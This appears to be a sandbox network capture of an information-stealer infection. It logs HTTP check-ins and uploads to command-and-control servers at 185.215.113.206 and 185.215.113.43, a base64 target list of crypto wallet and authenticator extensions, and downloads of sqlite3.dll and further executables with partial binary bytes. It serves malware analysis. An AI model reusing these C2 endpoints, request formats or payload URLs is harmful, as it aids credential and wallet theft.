Jan 3, 2025 15:21:32.226021051 CET	448	IN	Data Raw: 63 47 56 76 61 32 4a 70 61 32 68 6d 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 46 79 64 47 6c 68 62 69 42 42 63 48 52 76 63 79 42 58 59 57 78 73 5a 58 52 38 5a 57 5a 69 5a 32 78 6e 62 32 5a 76 61 58 42 77 59 6d 64 6a 61 6d 56 77 62 6d 68 70 59 6d Data Ascii: cGVva2Jpa2hmY2l8MXwwfDB8TWFydGlhbiBBcHRvcyBXYWxsZXR8ZWZiZ2xnb2ZvaXBwYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWtuZGpobmFnY2ZicGllbW5rZHBvbWNjbmpibG1qfDF8MHwwfExlYXAgVGVycmEgV2FsbGV0fGFpamNiZWRvaWptZ25sbWplZWdqYWdsbWVwYm1wa3BpfDF8MHwwfFR
Jan 3, 2025 15:21:32.226032019 CET	1236	IN	Data Raw: 4d 58 77 77 66 44 42 38 52 55 39 54 49 45 46 31 64 47 68 6c 62 6e 52 70 59 32 46 30 62 33 4a 38 62 32 56 73 61 6d 52 73 5a 48 42 75 62 57 52 69 59 32 68 76 62 6d 6c 6c 62 47 6c 6b 5a 32 39 69 5a 47 52 6d 5a 6d 5a 73 59 57 78 38 4d 58 77 77 66 44 Data Ascii: MXwwfDB8RU9TIEF1dGhlbnRpY2F0b3J8b2VsamRsZHBubWRiY2hvbmllbGlkZ29iZGRmZmZsYWx8MXwwfDB8R0F1dGggQXV0aGVudGljYXRvcnxpbGdjbmhlbHBjaG5jZWVpcGlwaWphbGprYmxiY29ibHwxfDB8MHxCaXR3YXJkZW58bm5nY2Vja2JhcGViZmltbmxuaWlpYWhrYW5kY2xibGJ8MXwwfDB8S2VlUGFzc1hDfG9
Jan 3, 2025 15:21:32.226042986 CET	1236	IN	Data Raw: 62 47 78 6c 64 48 78 6d 61 57 6c 72 62 32 31 74 5a 47 52 69 5a 57 4e 6a 59 57 39 70 59 32 39 6c 61 6d 39 75 61 57 46 74 62 57 35 68 62 47 74 6d 59 58 77 78 66 44 42 38 4d 48 78 46 59 33 52 76 49 46 64 68 62 47 78 6c 64 48 78 69 5a 32 70 76 5a 33 Data Ascii: bGxldHxmaWlrb21tZGRiZWNjYW9pY29lam9uaWFtbW5hbGtmYXwxfDB8MHxFY3RvIFdhbGxldHxiZ2pvZ3BvaWRlamRlbWdvb2NocG5rbWRqcG9jZ2toYXwxfDB8MHxDb2luaHVifGpnYWFpbWFqaXBicGRvZ3BkZ2xoYXBobGRha2lrZ2VmfDF8MHwwfE11bHRpdmVyc1ggRGVGaSBXYWxsZXR8ZG5nbWxibGNvZGZvYnBkcGV
Jan 3, 2025 15:21:32.226054907 CET	592	IN	Data Raw: 61 47 4e 73 5a 33 77 78 66 44 42 38 4d 48 78 43 59 57 4e 72 63 47 46 6a 61 79 42 58 59 57 78 73 5a 58 52 38 59 57 5a 73 61 32 31 6d 61 47 56 69 5a 57 52 69 61 6d 6c 76 61 58 42 6e 62 47 64 6a 59 6d 4e 74 62 6d 4a 77 5a 32 78 70 62 32 5a 38 4d 58 Data Ascii: aGNsZ3wxfDB8MHxCYWNrcGFjayBXYWxsZXR8YWZsa21maGViZWRiamlvaXBnbGdjYmNtbmJwZ2xpb2Z8MXwwfDB8VG9ua2VlcGVyIFdhbGxldHxvbWFhYmJlZmJtaWlqZWRuZ3BsZmptbm9vcHBiY2xra3wxfDB8MHxPcGVuTWFzayBXYWxsZXR8cGVuamxkZGpramdwbmtsbGJvY2NkZ2NjZWtwa2NiaW58MXwwfDB8U2FmZVB
Jan 3, 2025 15:21:32.227682114 CET	470	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----ECGDBAEHIJKKFHIEGCBG Host: 185.215.113.206 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 43 47 44 42 41 45 48 49 4a 4b 4b 46 48 49 45 47 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 61 32 62 36 39 38 63 63 61 61 62 32 62 36 36 35 32 36 37 61 30 32 64 61 63 30 65 65 65 36 33 61 37 65 66 61 64 63 63 39 65 37 33 35 39 61 39 38 32 63 65 66 39 63 33 66 35 65 66 65 66 65 37 34 39 64 62 62 39 30 33 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 42 41 45 48 49 4a 4b 4b 46 48 49 45 47 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 42 41 45 48 49 4a 4b 4b 46 48 49 45 47 43 42 47 2d 2d 0d 0a Data Ascii: ------ECGDBAEHIJKKFHIEGCBGContent-Disposition: form-data; name="token"aa2b698ccaab2b665267a02dac0eee63a7efadcc9e7359a982cef9c3f5efefe749dbb903------ECGDBAEHIJKKFHIEGCBGContent-Disposition: form-data; name="message"fplugins------ECGDBAEHIJKKFHIEGCBG--
Jan 3, 2025 15:21:32.456288099 CET	335	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 14:21:32 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
Jan 3, 2025 15:21:32.507538080 CET	203	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DAAAFBKECAKEHIEBAFIE Host: 185.215.113.206 Content-Length: 7723 Connection: Keep-Alive Cache-Control: no-cache
Jan 3, 2025 15:21:32.507599115 CET	7723	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 41 41 41 46 42 4b 45 43 41 4b 45 48 49 45 42 41 46 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 61 32 62 36 39 Data Ascii: ------DAAAFBKECAKEHIEBAFIEContent-Disposition: form-data; name="token"aa2b698ccaab2b665267a02dac0eee63a7efadcc9e7359a982cef9c3f5efefe749dbb903------DAAAFBKECAKEHIEBAFIEContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Jan 3, 2025 15:21:33.449232101 CET	202	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 14:21:32 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Jan 3, 2025 15:21:33.841434956 CET	94	OUT	GET /68b591d6548ec281/sqlite3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Jan 3, 2025 15:21:34.068586111 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 14:21:33 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT ETag: "10e436-5e7ec6832a180" Accept-Ranges: bytes Content-Length: 1106998 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
Jan 3, 2025 15:21:34.068627119 CET	1236	IN	Data Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 Data Ascii: #N@B/81s:<R@B/92P @B

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 15:21:42.553464890 CET	202	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JDHIEBFHCAKEHIDGHCBA Host: 185.215.113.206 Content-Length: 991 Connection: Keep-Alive Cache-Control: no-cache
Jan 3, 2025 15:21:42.553486109 CET	991	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 44 48 49 45 42 46 48 43 41 4b 45 48 49 44 47 48 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 61 32 62 36 39 Data Ascii: ------JDHIEBFHCAKEHIDGHCBAContent-Disposition: form-data; name="token"aa2b698ccaab2b665267a02dac0eee63a7efadcc9e7359a982cef9c3f5efefe749dbb903------JDHIEBFHCAKEHIDGHCBAContent-Disposition: form-data; name="file_name"Y29va2llc1xHb
Jan 3, 2025 15:21:43.851736069 CET	203	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 14:21:43 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Jan 3, 2025 15:21:44.028208971 CET	565	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KFCBAEHCAEGDHJKFHJKF Host: 185.215.113.206 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 46 43 42 41 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 61 32 62 36 39 38 63 63 61 61 62 32 62 36 36 35 32 36 37 61 30 32 64 61 63 30 65 65 65 36 33 61 37 65 66 61 64 63 63 39 65 37 33 35 39 61 39 38 32 63 65 66 39 63 33 66 35 65 66 65 66 65 37 34 39 64 62 62 39 30 33 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 42 41 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 42 41 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------KFCBAEHCAEGDHJKFHJKFContent-Disposition: form-data; name="token"aa2b698ccaab2b665267a02dac0eee63a7efadcc9e7359a982cef9c3f5efefe749dbb903------KFCBAEHCAEGDHJKFHJKFContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------KFCBAEHCAEGDHJKFHJKFContent-Disposition: form-data; name="file"------KFCBAEHCAEGDHJKFHJKF--
Jan 3, 2025 15:21:44.827269077 CET	202	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 14:21:44 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 15:22:03.776982069 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jan 3, 2025 15:22:04.502007008 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 03 Jan 2025 14:22:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 15:22:06.022277117 CET	314	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jan 3, 2025 15:22:06.752643108 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 03 Jan 2025 14:22:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 35 63 31 0d 0a 20 3c 63 3e 31 30 32 39 38 36 39 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 39 63 32 64 63 37 31 35 31 63 65 63 30 32 62 34 31 39 31 64 30 33 35 34 39 61 63 39 62 33 30 32 62 65 62 34 39 61 35 35 33 36 65 36 23 31 30 32 39 39 31 39 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 64 65 37 31 39 62 35 30 35 39 62 62 30 30 61 62 35 65 34 35 34 32 35 31 39 37 64 31 61 61 31 64 61 61 61 38 23 31 30 32 39 39 32 30 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 63 35 36 63 38 61 30 65 35 65 62 66 35 64 65 30 34 33 34 39 30 32 35 30 38 30 64 39 23 31 30 32 39 39 32 31 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 [TRUNCATED] Data Ascii: 5c1 <c>1029869001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fb9c2dc7151cec02b4191d03549ac9b302beb49a5536e6#1029919001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbde719b5059bb00ab5e45425197d1aa1daaa8#1029920001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbc56c8a0e5ebf5de04349025080d9#1029921001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbde719b5059bb01ab5e45425197d1aa1daaa8#1029922001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbc770934541bf5dab5e45425197d1aa1daaa8#1029923001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbde719b5059bb02ab5e45425197d1aa1daaa8#1029924001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbc96d9b4247bc52ea03564d5b9cd3e956b7b5d1#1029925001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e7e7b9ca30804042ba5ce902415450#1029926001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8f8e6b1ca72dd534db057eb410a494d9d#1029927001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8fcf7b8c730804042ba5ce902415450#1029928001+++fc [TRUNCATED]
Jan 3, 2025 15:22:06.752659082 CET	124	IN	Data Raw: 34 66 34 62 32 38 34 36 64 39 33 34 66 34 38 62 31 35 65 61 61 34 39 35 63 34 39 23 31 30 32 39 39 32 39 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 Data Ascii: 4f4b2846d934f48b15eaa495c49#1029929001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbc07e804d03ac52ea484b411b9dc4e1#
Jan 3, 2025 15:22:06.882293940 CET	304	IN	Data Raw: 31 30 32 39 39 33 30 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 63 64 37 65 38 36 34 34 30 33 61 63 35 32 65 61 34 Data Ascii: 1029930001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbcd7e864403ac52ea484b411b9dc4e1#1029931001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbc67e805545b01cf64d4a485a9592e100b7#1029932001+++b5937c1a99d5f9df0b5dafc85062384760

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 15:22:06.290168047 CET	80	OUT	GET /mine/random.exe HTTP/1.1 Host: 185.215.113.16 Cache-Control: no-cache
Jan 3, 2025 15:22:06.990670919 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 03 Jan 2025 14:22:05 GMT Content-Type: application/octet-stream Content-Length: 3183616 Last-Modified: Fri, 03 Jan 2025 13:55:02 GMT Connection: keep-alive ETag: "6777ec36-309400" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 9a 01 00 00 00 00 00 00 a0 30 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$-ICCC@CFBC6GC6@C6FCGCBCB5CxJCxCxACRichCPELVf0@0F0@Wk00 @.rsrc@.idata @fjvnplhk))@netceafy0n0@.taggant00"r0@
Jan 3, 2025 15:22:06.990690947 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Jan 3, 2025 15:22:06.990701914 CET	448	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Jan 3, 2025 15:22:06.990711927 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Jan 3, 2025 15:22:06.990721941 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: u;vY^mqM8vYU^mqME
Jan 3, 2025 15:22:06.990731955 CET	48	IN	Data Raw: 4e da e7 7e 38 35 54 c4 b2 41 de a2 b1 59 9d 2e cc e5 a5 26 bf 1b a4 7e 58 18 71 4d ce c3 b9 a6 46 da e7 7e 38 b5 5b c4 b2 41 3e ad b1 59 9d 4e Data Ascii: N~85TAY.&~XqMF~8[A>YN
Jan 3, 2025 15:22:06.990813017 CET	1236	IN	Data Raw: ca e5 a5 26 9f 1b a4 7e 58 18 71 4d ce c3 b9 a6 5e da e7 7e 38 fd 52 c4 b2 41 9e a2 b1 59 9d ee cb e5 a5 26 ff 1e a4 7e 58 18 71 4d ce c3 b9 a6 96 da e7 7e 38 f5 5e c4 b2 41 fe a2 b1 59 9d 0e cb e5 a5 26 df 1e a4 7e 58 18 71 4d ce c3 b9 a6 6e da Data Ascii: &~XqM^~8RAY&~XqM~8^AY&~XqMn~8UA^Y&?~XqMf~8E^AY&~XqM~~8hAYn&~XqM6~8TA~Y&_~XqM~8QhAY.&~XqM
Jan 3, 2025 15:22:06.990886927 CET	1236	IN	Data Raw: 38 f5 51 c4 b2 41 de a5 b1 59 9d 2e dd e5 a5 26 bf 12 a4 7e 58 18 71 4d ce c3 bd a6 aa 24 f8 7e 38 85 53 c4 b2 41 3e a4 b1 59 9d 4e db e5 a5 26 9f 12 a4 7e 58 18 71 4d ce c3 49 a6 a6 24 f8 7e 38 6d 5e c4 b2 41 9e a5 b1 59 9d ee dc e5 a5 26 ff 1d Data Ascii: 8QAY.&~XqM$~8SA>YN&~XqMI$~8m^AY&~XqMN$~89WAY&~XqMIZ$~8iA^Y&?~XqMb$~8[AY&~XqM6$~8PAYn&~XqMM$~8^A~Y&_
Jan 3, 2025 15:22:06.990899086 CET	1236	IN	Data Raw: 58 18 71 4d ce c3 bd a6 1e 20 f8 7e 38 bd 5a c4 b2 41 7e 9b b1 59 9d 8e ee e5 a5 26 5f 11 a4 7e 58 18 71 4d ce c3 bd a6 2a 20 f8 7e 38 55 5f c4 b2 41 de 98 b1 59 9d 2e ee e5 a5 26 bf 11 a4 7e 58 18 71 4d ce c3 b5 a6 26 20 f8 7e 38 bd 54 c4 b2 41 Data Ascii: XqM ~8ZA~Y&_~XqM* ~8U_AY.&~XqM& ~8TA>YN&~XqM ~8-RAY&~XqM ~8ZAY&~XqM ~85ZA^Y&?~XqM ~8SAY&~XqMM ~8%SA
Jan 3, 2025 15:22:06.990909100 CET	1236	IN	Data Raw: 07 7a 80 39 ce 6d 71 4d ce 6d 71 4d ce 6d 71 4d ce ea 3a 2d 07 e2 bd 03 75 a9 f5 af fb ca b1 26 2d 5c 2e 1c 0f 65 b1 b3 cf 6d 71 4d ce 6d 71 4d ce ea 3a 2d 0f 4d b1 df 86 b9 e7 7e be 1a 3c ba fe 20 88 86 0d 9a 29 b7 07 4e 3c aa e6 22 ff 7a f3 9a Data Ascii: z9mqMmqMmqM:-u&-\.emqMmqM:-M~< )N<"z-~@>{tYw&~!:Gb&~z8YqM:-D C0fZ~wy&^~e8YqM"z^{tY&/~XqMmqMmqMmqM z9${ubM:-D tfZ~AA
Jan 3, 2025 15:22:06.995803118 CET	1236	IN	Data Raw: a7 67 3c c2 12 ee f3 51 c9 d4 58 f9 7d 7d b5 03 b6 af 3c ba da 22 f8 46 8b 98 f8 46 8f 49 f7 26 29 b3 a2 7e 06 9a 05 f8 f6 ad 67 85 b4 59 1a 69 f3 9a 05 79 fa ca 05 ae 0d e2 7d 21 7d c4 a4 7e 06 ea 79 f8 f8 a9 93 62 06 e2 d5 b8 07 1e 24 13 b2 a9 Data Ascii: g<QX}}<"FFI&)~gYiy}!}~yb$~:bX"9,\|$zyYxFE5HuqC".\|aOafY~"zYGuaGuA&~f2~S p dY~I]";d]"

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 15:22:06.891793013 CET	66	OUT	GET /files/7254021059/abu7zly.exe HTTP/1.1 Host: 31.41.244.11
Jan 3, 2025 15:22:07.578461885 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 03 Jan 2025 14:22:07 GMT Content-Type: application/octet-stream Content-Length: 1853952 Last-Modified: Fri, 03 Jan 2025 12:34:08 GMT Connection: keep-alive ETag: "6777d940-1c4a00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 3e 1a 6f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 9e 00 00 00 8e 01 00 00 00 00 00 00 20 47 00 00 20 00 00 00 c0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 